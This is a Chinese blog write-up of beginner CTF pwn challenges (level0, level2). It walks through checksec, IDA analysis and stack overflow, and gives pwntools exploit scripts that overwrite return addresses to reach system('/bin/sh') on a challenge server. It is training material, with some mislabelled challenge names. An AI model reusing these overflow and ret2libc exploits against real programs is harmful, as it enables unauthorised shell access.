夏令营第二周pwn的level0题总结

最新推荐文章于 2023-02-28 13:24:53 发布
最新推荐文章于 2023-02-28 13:24:53 发布
阅读量614 收藏 1
点赞数 1
分类专栏: 做题
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MIGENGKING/article/details/97162902
版权

关于pwn的基础知识,可以看一遍比较好的博客,如下:
链接:https://www.jianshu.com/p/6e528b33e37a

pwntools使用简介:
链接:https://blog.csdn.net/qq_29343201/article/details/51337025

PWN-shellcode获取与编写:
链接:https://blog.csdn.net/qq_35495684/article/details/79583232

做pwn的题目常见工具有:IDAx32位,IDAx64位,乌班图(ubuntu)虚拟机;详细安装请看我上篇博客:

攻防世界pwn的level0的基础题:

下载好题目的附件后,把附件直接放进乌班图虚拟机内:

然后打开虚拟机终端,查看文件的内容:
cd命令:切换目录
checksec:查看文件
cat命令查看文件列表
在这里插入图片描述发现level0的有用信息:
(1)Arch设置架构为amd64,可以简单的认为设置为64位的模式
,而32位模式是’i386’。
(2):开启了NX保护,NX(DEP)即No-eXecute(不可执行)的意思,同样的,如果NX开启后,溢出转到shellcode以后,由于开启了不可执行,所以cpu就会抛出异常,而不去执行恶意指令。
什么是shellcode?
shellcode就是一段二进制代码,程序中最进本单元,我们一般无法手动写出,通常是通过编写c语言代码进行编译,然后反汇编后拿到二进制代码。在pwntools中已经包含了可以生成shellcode代码的方法,大大缩减了我们的工作量

因此我们去打开IDAx64位,把文件放进IDA中,进行静态分析;

(3)这个程序流程很简单,用ida分析就两个主要的函数:

main:

在这里插入图片描述

vulnerable_function:

在这里插入图片描述
可以看到在vulnerable_function中泄漏了buf的内存,用checksec可以发现这个程序编译时开启栈不可执行保护,于是我们就可以在buf里面输入shellcode和填充字符,将vulnerable_function的返回地址覆盖为buf的栈上地址,实现一次较简单的栈溢出攻击。(可以在传入buf 时覆盖栈的函数返回地址,即可以返回system函数的地址再给system传入参数"/bin/sh" 就可以进入服务器的终端得到flag)

(4)
把文件放进IDA里面后先按F5找到题目的伪代码:

在这里插入图片描述在这里插入图片描述

(5)先去Funttion name找到system函数(为什么呢?因为level题目主要是构建system函数,找到/bin/sh终端(就是为了建立后门,然后返回shell)

在这里插入图片描述
有system(“/bin/sh”)函数,然后去找栈溢出的函数;

在这里插入图片描述(6):找到溢出的函数后,然后在ida中寻找字符串(string)(目的:找到"/bin/sh"的覆盖地址(看脚本))。

在这里插入图片描述

(7) 其实做pwn的题目主要的是要学会分析和写出脚本!!!

level1脚本如下:

from pwn import *

s_addr=0x0000000000400596
p=remote(“pwn2.jarvisoj.com”,9881)
p.recvline()
p.sendline(“A”*0x80+‘A’*8+p64(s_addr))
p.interactive()

分析!:
(1):“from pwn import *”#导入pwntools中pwn包中所有的内容

(2):“p=remote(“pwn2.jarvisoj.com”,9881)”#连接服务器远程交互,等同于nc ip 端口 命令,,括号内容为题目的网址和端口。

(3):“recvline” #接收输出

(5)“s_addr=0x0000000000400596” 的地址为callsystem的地址:
如何找到指定函数的地址?按F5反编译之后然后按空格进入函数与地址的结构页面(synchronized with HexView-1)然后在Function name 找到指定函数即地址:
在这里插入图片描述

(6):“p.sendline(“A”*0x80+‘A’*8+p64(s_addr))”发送用0x88个无用字符覆盖buf和push中的内容,之后再返回地址。

(7):"p.interactive()"反弹shell进行交互

png栈的图:

在这里插入图片描述

如何得到flag?

把脚本新建成一个以“.py”为后缀的Python文件,然后放进Ubuntu虚拟机内进行运行:

在这里插入图片描述
在这里插入图片描述

攻防世界pwn的level1的基础题:

level1h和level0的解题思路大致相同:不过level1的Arch设置架构为amd64,我们需要打开IDAx32位的,如图:

在这里插入图片描述

在这里插入图片描述

攻防世界pwn的level2的基础题:

在这里插入图片描述

level2的运行脚本:

from pwn import *

#p = process(’./level2’)
p = remote(‘pwn2.jarvisoj.com’,‘9878’)
elf = ELF(’./level2’)

sh_addr = elf.search(’/bin/sh’).next()
print p32(sh_addr)
system_addr = elf.symbols[‘system’]
print p32(system_addr)
exit_addr = elf.symbols[‘read’]
print p32(exit_addr)

payload = ‘a’ * (0x88 + 0x4) + p32(system_addr) + p32(exit_addr) + p32(sh_addr)

p.send(payload)
p.interactive()

分析脚本:
在这里插入图片描述
有些指令和上面重复就不多讲啦,选一些重要的讲:

(1)elf = ELF(’./level2’) #ELF文件格式读取level2文件
(2)“sh_addr = elf.search(’/bin/sh’).next()” #

在这里插入图片描述

MIGENGKING
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
攻防世界(pwn篇)---level0
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
04-13 1466
攻防世界(pwn篇)—level0 文章目录攻防世界(pwn篇)---level0目描述基本情况分析运行分析IDA 分析分析出payloadexp 目描述 菜鸡了解了什么是溢出,他相信自己能得到shell 基本情况分析 发现只开启了 NX(数据不可执行)保护机制,因此可以做栈溢出漏洞攻击。 1.RELRO: RELRP会有Pratial RELRO 和FULL RELRO,如果开启FULL RELRO,意味着我们无法修改got表 2.Stack: Canary found 表示不能直接用溢
pwn_level0
qq_42956710的博客
08-15 2654
level0(deepin解记录) 打开链接: 判断了下文件类型及其保护 在终端里面运行一下: 64位的,所以就用idax64打开 看一下数据位置: 其中有bin/sh, 里面有几个函数需要看看,callsystem,main,read,vulnerable_function 栈溢出,由于没有NX保护和开栈保护,为了得到shell,可以找一个输入没有限制的...
攻防世界 Pwn level0
MrTreebook的博客
07-13 145
攻防世界pwn level0 下载本地文件拉到Kali 检查文件 file level0 checksec level0 没有开任何保护 拉进IDA看一下 在这里看到了 ”bin/sh" 可以在这里获取shell权限 目标明确 看到了vulnerable_function 很明显是栈溢出的操作 看一下栈空间 buf上需要覆盖 80-0+8 大小的数据 r 上弹 callsystem的地址即可 开始写exp ##coding=utf8 from pwn import * ## 构
攻防世界PWN-level0
Deeeelete的博客
11-12 2559
目:level0 老规矩先进PE 查看是64位程序,可以考虑直接IDA莽,也可以进checksec查一下详细参数 比较脆,无PIE且没了栈保护(Stack-canary),容易GOT改写( RELRO) 简单运行一遍,发现是hello word 进64位IDA 鼠标悬停在main函数上按f5反编译 查看源码: 过于简单,没啥可用的信息,双击它return的脆弱函数进一步查看 int __cdecl main(int argc, const char **argv, const
攻防世界PWN——level0
Greic的博客
12-01 3492
嘿嘿,又是我,我又肥来了。今天带来的是攻防世界第三的writeup,这次话不多说,我们直接进入主。 无论怎么样,pwn前两步少不了——查看文件类型和保护类型: 64位linux操作系统,只开了NX保护,再打开IDA看看。 将Hello,World显示到屏幕上,再点开函数看看: 可以看到,buf是分配了80个字节(从rbp-80-rbp+0),但是read函数读入了0x200字节,因此,这里明显有栈溢出,再点开buff看看: 可以看到,我们只需要将buf和s覆盖,也就...
level0 -- 攻防世界新手
01-19
来自攻防世界的pwn,是一道简单的新手样本目,但由于不同linux的libc版本,会使得在ubuntu18.04以及ubuntu20.04中进行漏洞利用产生一些小问。漏洞利用问解决链接:...
arm32 android版pwn-level6二进制文件+gdbserver+lldb+socat
最新发布
04-17
arm32 android版pwn-level6二进制文件+gdbserver+lldb+socat,文章pwn - 零基础ROP之Android ARM 32位篇(新修订)https://blog.csdn.net/tabactivity/article/details/137780714 全部资料文件。 0基础pwn
warmup pwn入门
02-11
pwn入门
一道pwn入门的练习
10-23
直接以一个非常简单的栈溢出例子(基于Linux)来讲解pwn所要用到的一些常用的工具及命令的用例
welpwn pwn 入门
02-11
pwn 入门
攻防世界pwnlevel0
Sakura给爷pwn全场
09-02 298
查壳64bit 拖进IDA f5查看伪代码 vulnerable_function中文译为脆弱函数,可疑,点进去查看vulnerable函数。 buf数组距离栈帧顶部rsp为0h,距离栈帧顶部rbp为80h,可知buf长度为0x80. 查看vulnerable函数栈 s代表save ebp,长度8个字节 r代表return address,长度8个字节,通常只要覆盖4个字节。 查看callsystem函数,代码段地址为0x400596 思路 把return address用callsystem函数
攻防世界pwn新手练习(level0)
BurYiA的博客
10-24 959
level0 老规矩哦,我们先checksec一下,收集一下信息 64位程序,开了NX,没啥说的,还在接受范围内,运行一下试试 唔,没啥东西,继续IDA吧。(╯‵□′)╯︵┴─┴ emmm,主函数倒是挺简单的,就一行打印,一行输入 但…不知你们有米有发现有个很奇怪的函数名,我们悄悄的瞅一瞅 果然不对劲,首先它的名字中有个system(手动加粗),这个是什么东西嘞,简单的来说,它拥有系统的最高...
攻防世界新手PWN——level0)
0pt1mus
12-19 1119
level0 转载自:superj.site的博客 0x00 首先,进行通过file判断附件文件类型。 判断是ELF文件。这时就可以通过checksec判断文件的保护措施。 得到只开启了执行保护,地址随机化、栈保护都没有开启。 0x01 开始IDA逆向分析。 在其中发现了main、vulnerable_function、callsystem函数逐个查看这三个函数。 发现该中用到了w...
攻防世界pwn level0做思路
nzw1134864657的博客
07-24 1849
先看看目的各种保护机制 栈不可以执行,我们用IDA打开看看 写进一个hello world的字符串,然后执行vulnerable_function()函数 跟进函数里查看 这里我不是特别理解,writeup上是这样写的 “这是 vulnerable_function 函数,可以在栈上写0x200个字节,或许我们可以进行溢出,覆盖掉返回地址,劫持程序执行流,执行我们想执行的方法。通常我们的目...
pwn level0--沙窝里的王
weixin_43600412的博客
07-23 207
下载文件后查看属性,发现不认识,语言编译器打开后是一堆64位编码,看不到信息,载入IDA查看主函数的C语言形式: 显示读入“hello world”,下面的 vulnerable_function函数有hello world作为参数,点开后却发现与hello world没多大关系: 程序显示buf长度为0x80,即0x80h填充满,之后跟上地址就可以实现任意跳转。 shift+F12查找字符串:...
攻防世界pwn-level0详细步骤
m0_74047686的博客
02-28 1393
学习pwn开始,慢慢来不要急
CTF中的PWN——绕NX防护1(本地libc 栈溢出)
壊壊的诱惑你的博客
09-29 4230
进阶到防护篇了,首先学一下NX防护的基础目。 NX防护 NX是数据与程序的分水岭,栈溢出核心思想是通过局部变量覆盖函数返回地址来修改EIP和注入 Shellcode,在函数返回时跳到Shellcode去执行。要防止这种攻击,最有效的办法就是让攻击者注入的Shellcode无法执行,这就是数据执行保护(Data Execution Prevention, DEP)安全机制的初衷...
pwn学习总结(三) —— 栈溢出经典型整理
qq_41988448的博客
11-19 2778
pwn学习总结(五) —— 经典目整理一1. 栈溢出入门2. 字符串截取+缓冲区执行3. GOT泄露4. libc泄露5. 使用DynELF实现远程libc泄露 1. 栈溢出入门 平台:jarvisoj 目:level0 靶机:nc pwn2.jarvisoj.com 9881 查看程序防护: 查看反汇编: exp: from pwn import * import pwn r = ...
Xman pwn level0 writeup
qq_39596232的博客
08-23 1578
目描述: 菜鸡了解了什么是溢出,他相信自己能得到shell 解思路: 1、拿到文件,首先查看一下文件类型: tucker@ubuntu:~/pwn$ file level0 level0: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/l, fo...
ctf 简单pwn资源
08-09
总结来说,CTF 简单 PWN 目资源是指为了提高参赛者在 PWN 领域的技能而准备的一些简单的二进制漏洞利用目。这些资源可以通过在线平台、开源项目和教程找到,对于想要在 CTF 竞赛中取得好成绩或提高网络安全技能...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值